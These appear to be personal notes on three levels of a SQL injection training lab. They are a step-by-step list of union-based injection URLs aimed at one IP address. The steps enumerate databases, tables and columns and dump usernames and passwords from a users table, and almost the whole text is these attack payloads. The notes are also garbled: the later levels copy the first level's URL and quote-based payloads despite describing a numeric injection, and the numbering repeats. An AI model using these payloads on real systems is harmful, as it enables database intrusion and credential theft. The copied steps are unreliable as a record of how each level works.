sql injection exercise
Less-1
1.http://112.126.63.198/Less-1/?id=1' Determine whether there is SQL injection (character injection)
2.http://112.126.63.198/Less-1/?id=1' order by 3–+ How many columns are in the query
3. http://112.126.63.198/Less-1/?id=0'union select 1,2,3 Determine the echo position
3. http://112.126.63.198/Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ query database name information
4.http://112.126.63.198 /Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+Query table name
5. select group_concat(column_name) from information_schema.columns where table_name='users' Query the column name in users in security
select group_concat(password) from security.users
select group_concat(username) from security.users
Get username and password
Less-2
1. http://112.126.63.198/Less-1/?id=1' Determine whether there is SQL injection (error report, there is an injection point) (numerical injection)
2.http://112.126.63.198/Less-1/ ?id=1' order by 3–+ How many columns are in the query
3. http://112.126.63.198/Less-1/?id=0'union select 1,2,3 Determine the echo position
3. http://112.126.63.198/Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ query database name information
4.http://112.126.63.198 /Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+query table name
5. select group_concat(column_name) from information_schema.columns where table_name='users' query column name
select group_concat(password) from security.users
select group_concat(username) from security.users
Get username and password
Less-3
1.http://112.126.63.198/Less-1/?id=1' Determine whether there is SQL injection (error report, there is an injection point)
?id=1 and 1=2 No error is reported, not numeric
2.http:/ /112.126.63.198/Less-1/?id=1' order by 3--+ How many columns are in the query
3. http://112.126.63.198/Less-1/?id=0'union select 1,2,3 judgment Echo position
3. http://112.126.63.198/Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ query database name information
4.http://112.126.63.198 /Less-1/?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+query table name
5. select group_concat(column_name) from information_schema.columns where table_name='users' query column name
select group_concat(password) from security.users
select group_concat(username) from security.users to
get the username and password